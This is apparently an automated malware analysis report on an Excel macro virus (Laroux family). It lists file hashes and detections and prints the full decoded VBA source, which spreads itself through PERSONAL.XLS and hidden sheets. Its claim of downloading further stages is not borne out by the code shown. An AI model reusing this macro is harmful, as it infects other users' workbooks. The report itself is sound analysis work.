Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 96eee25bd64dcace…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d9149769064c0cd37ef19097b5d81257 SHA-1: 65f47c093de43e37b50c111051059e815517f482 SHA-256: 96eee25bd64dcacee90944b613a58cd83dc030098d0a673c2e58efaef0930b83
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV detection indicates this is a known malicious Excel file, specifically identified as Xls.Trojan.Laroux-31. The presence of an Auto_Open VBA macro suggests an attempt to execute malicious code automatically upon opening the document. The script appears to be designed to establish persistence by copying itself to the startup folder and potentially downloading further stages, indicated by the manipulation of `PERSONAL.XLS` and the `Auto_Search` subroutine.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-31
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1866 bytes
SHA-256: 7767f556eaa88900692c23212c95dfe08fc5dea9787fd64fa8adcbc9c8b0099f
Detection
ClamAV: Xls.Trojan.Laroux-31
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Mars"








Public AllOkey
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "Auto_Search"
End Sub

Sub Auto_Search()
Attribute Auto_Search.VB_ProcData.VB_Invoke_Func = " \n14"
    AuLoad$ = "PERSONAL.XLS"
    AuName$ = "Mars"
    AcName$ = ActiveWorkbook.Name
    AsName$ = Workbooks(AcName$).Sheets(1).Name
    If ActiveWorkbook.Modules.Count = 0 Then
        If Not AsName$ = AuName$ Then
            Application.ScreenUpdating = False
            Workbooks(AuLoad$).Sheets(AuName$).Copy Before:= _
            Workbooks(AcName$).Sheets(1)
            Workbooks(AcName$).Sheets(AuName$).Visible = False
            Application.ScreenUpdating = True
            Application.OnSheetActivate = AuLoad$ + "!" + "Auto_Search"
        End If
    ElseIf Not AllOkey Then
        AcPath$ = ActiveWorkbook.Path
        AsPath$ = Application.StartupPath
        AsFind$ = Dir(AsPath$ & "/" & AuLoad$)
        AllOkey = True
        If AsFind$ <> AuLoad$ Then
            Application.ScreenUpdating = False
            Sheets(AuName$).Visible = True
            Sheets(AuName$).Select
            Sheets(AuName$).Copy
            With ActiveWorkbook
                .Title = ""
                .Subject = ""
                .Author = ""
                .Keywords = ""
                .Comments = ""
            End With
            AcCopy$ = ActiveWorkbook.Name
            AcPath$ = CurDir()
            ChDir AsPath$

            ChDir AcPath$
            Workbooks(AcName$).Sheets(AuName$).Visible = False
            Application.ScreenUpdating = True
            Application.OnSheetActivate = AuLoad$ + "!" + "Auto_Search"
        End If
    End If
End Sub
'                                           Bengkalis, 10 Januari 1997

Open this report in the interactive analyzer, or submit your own file for analysis.